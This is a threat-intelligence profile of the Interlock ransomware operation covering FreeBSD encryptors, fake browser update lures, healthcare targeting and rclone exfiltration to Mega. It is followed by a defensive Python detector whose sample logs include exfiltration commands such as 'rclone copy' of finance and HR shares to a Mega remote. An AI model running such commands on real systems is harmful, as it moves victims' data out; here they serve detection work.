Interlock Ransomware (Cisco Talos canonical disclosure, November 2024) is a financially motivated cybercriminal ransomware operation that emerged in approximately September-October 2024. Its tradecraft is operationally distinctive in three respects.

(1) CROSS-PLATFORM RANSOMWARE ENCRYPTOR DEVELOPMENT INCLUDING FREEBSD TARGETING. Interlock operators have developed and deployed ransomware encryptor variants for Windows, Linux and FreeBSD; the FreeBSD capability is what sets the cluster apart in the ransomware ecosystem. FreeBSD is a Unix-like operating system used in selective server and appliance environments (network appliances, security infrastructure such as firewalls and IDS, some web-serving environments) but is rarely targeted by ransomware operators, which has left FreeBSD hosts as relatively safe-haven platforms in mixed-environment ransomware incidents. Interlock's FreeBSD encryptor removes that safe-haven assumption for affected victim organizations and reflects a tooling investment beyond the commodity ransomware norm.

(2) CLEARFAKE-STYLE FAKE BROWSER UPDATE INITIAL ACCESS TRADECRAFT. Interlock operators rely on ClearFake-style fake browser update social-engineering lures for initial access: they compromise legitimate websites (often via JavaScript injection into WordPress or other CMS-managed sites), serve visitors a fake browser update overlay claiming that Chrome or Microsoft Edge requires a security update, and deliver the initial Interlock payload through the fake update installer. This signature initial-access tradecraft distinguishes Interlock from compromised-credential-driven ransomware clusters (Fog Ransomware, fog_ransomware.yaml) and from N-day-exploitation-driven clusters, and places Interlock within the broader fake-browser-update social-engineering ecosystem that has emerged as a significant ransomware delivery pathway in 2023-2025.
(3) HEALTHCARE SECTOR TARGETING WITH PATIENT-SAFETY IMPLICATIONS. Interlock operators have shown a significant targeting focus on healthcare sector victims, including the high-profile attack on DaVita Inc., one of the largest US dialysis providers. Healthcare targeting carries direct patient-safety implications: ransomware operations against dialysis providers and hospitals can disrupt critical patient care services, adding patient-safety risk to the data-breach and financial impacts. The HHS Health Sector Cybersecurity Coordination Center (HC3) has issued multiple advisories on Interlock Ransomware threat indicators for healthcare sector defenders.

Cisco Talos has assessed possible operational linkage between Interlock operators and the Rhysida ransomware ecosystem (rhysida_ransomware.yaml) based on observed tooling overlaps and similarities in operational tradecraft; this linkage assessment is analytical and not confirmed.

The cluster operates the standard double-extortion ransomware model: data exfiltration to Mega.nz cloud storage via rclone, encryption of victim systems with the cross-platform encryptors, and ransom demands leveraged by both the encryption impact and threatened data publication on the cluster-controlled WorldLeaks dark-web leak site.

Interlock Ransomware is curated alongside the broader ransomware ecosystem coverage in this corpus (LockBit, lockbit_operators.yaml; Akira, akira_ransomware.yaml; Play, play_ransomware.yaml; Black Basta, black_basta.yaml; Royal / BlackSuit, royal_blacksuit.yaml; Cactus, cactus_ransomware.yaml; Rhysida, rhysida_ransomware.yaml; INC Ransom, inc_ransom.yaml; Medusa, medusa_ransomware.yaml; Qilin, qilin_ransomware.yaml; Hunters International, hunters_international.yaml; BianLian, bianlian.yaml; RansomHub, ransomhub.yaml; Fog, fog_ransomware.yaml; DragonForce, dragonforce.yaml; Embargo, embargo_ransomware.yaml; NoEscape, noescape.yaml; Trigona, trigona_ransomware.yaml; Hive, hive_ransomware.yaml; REvil, revil_sodinokibi.yaml; DarkSide / BlackMatter, darkside_blackmatter.yaml; ALPHV / BlackCat, alphv_blackcat.yaml; Maze, maze_ransomware.yaml; Conti / Wizard Spider, wizard_spider_conti.yaml; Cuba, cuba_ransomware.yaml; Vice Society / Vanilla Tempest, vice_society_vanilla_tempest.yaml). Its operational distinctiveness within this ecosystem is the cross-platform encryptor capability including FreeBSD and the ClearFake-style fake-browser-update initial-access tradecraft.
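The double-extortion stage described above (exfiltration to Mega.nz via rclone) is the part of this tradecraft that leaves the clearest host-side footprint, so a defender-side check is worth showing. The following is an added detection example written for this profile; it is not code from the original page, from Cisco Talos or from any vendor. It runs over constructed process-creation log lines in an assumed "ts host= user= pid= cmd=" format and over a constructed rclone.conf, flags rclone upload verbs to any remote, and escalates when the remote's backend resolves to Mega. The rclone config key `type = mega` is rclone's real backend name; treating an unresolved remote literally named "mega" as Mega is a labelled heuristic, not an rclone guarantee.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample process-creation events (not from the page or any real incident).
# Assumed format: "<timestamp> host=<host> user=<user> pid=<pid> cmd="<command line>""
SAMPLE_LOGS = [
    '2024-11-02T03:14:07Z host=fs01 user=svc_backup pid=4412 cmd="rclone copy D:\\Shares\\Finance mega:exfil-2024 --transfers 8 -P"',
    '2024-11-02T03:14:20Z host=fs01 user=svc_backup pid=4420 cmd="rclone.exe sync E:\\HR remote1:hr --config C:\\Users\\Public\\r.conf"',
    '2024-11-02T03:15:01Z host=web02 user=www pid=911 cmd="rclone copy /var/backups gdrive:nightly"',
    '2024-11-02T03:16:40Z host=ws15 user=alice pid=2201 cmd="notepad.exe C:\\Users\\alice\\notes.txt"',
]

# Constructed rclone.conf as an analyst might recover it from the host. "type = mega" is
# rclone's real Mega backend identifier; the remote names and credentials are made up.
SAMPLE_RCLONE_CONF = """
[remote1]
type = mega
user = someone@example.invalid
pass = REDACTED

[gdrive]
type = drive
"""

LOG_RE = re.compile(
    r'^(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) pid=(?P<pid>\d+) cmd="(?P<cmd>.*)"$'
)
REMOTE_RE = re.compile(r'^(?P<name>[A-Za-z0-9_-]+):(?P<path>.*)$')
RCLONE_BINARIES = {"rclone", "rclone.exe"}
UPLOAD_VERBS = {"copy", "sync", "move", "copyto", "moveto"}  # rclone subcommands that push data


@dataclass
class Finding:
    host: str
    user: str
    verb: str
    remote: str
    backend: Optional[str]
    severity: str


def parse_rclone_conf(text: str) -> Dict[str, str]:
    """Map remote name -> backend type from INI-style rclone.conf content."""
    remotes: Dict[str, str] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", ";")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
        elif "=" in line and current:
            key, _, value = line.partition("=")
            if key.strip() == "type":
                remotes[current] = value.strip().lower()
    return remotes


def extract_remote(argv: List[str]) -> Optional[str]:
    """Return the first rclone remote name ("name:path") among the positional arguments."""
    for arg in argv[2:]:  # skip binary and verb
        if arg.startswith("-"):
            continue
        m = REMOTE_RE.match(arg)
        if not m:
            continue
        name = m.group("name")
        # A single letter followed by a path separator is a Windows drive, not a remote.
        if len(name) == 1 and m.group("path")[:1] in ("\\", "/"):
            continue
        return name
    return None


def analyze(log_lines: List[str], rclone_conf: str = "") -> List[Finding]:
    """Flag rclone uploads; severity "high" when the destination backend resolves to Mega."""
    remotes = parse_rclone_conf(rclone_conf)
    findings: List[Finding] = []
    for line in log_lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        argv = m.group("cmd").split()
        if len(argv) < 2:
            continue
        binary = argv[0].replace("\\", "/").rsplit("/", 1)[-1].lower()
        verb = argv[1].lower()
        if binary not in RCLONE_BINARIES or verb not in UPLOAD_VERBS:
            continue
        remote = extract_remote(argv)
        if remote is None:
            continue
        # Resolve via recovered config; fall back to the heuristic that a remote literally
        # named "mega" is the Mega backend (assumption, since default remote names mirror it).
        backend = remotes.get(remote) or ("mega" if remote.lower() == "mega" else None)
        severity = "high" if backend == "mega" else "medium"
        findings.append(Finding(m.group("host"), m.group("user"), verb, remote, backend, severity))
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOGS, SAMPLE_RCLONE_CONF):
        print(f"[{f.severity}] {f.host} {f.user}: rclone {f.verb} -> {f.remote} ({f.backend or 'unknown backend'})")
```

Without the recovered config, `remote1` stays unresolved and only drops to medium; the rclone invocation itself is still surfaced, which is the point: on a file server the presence of rclone with an upload verb is the signal to triage, and the backend resolution only decides how loudly.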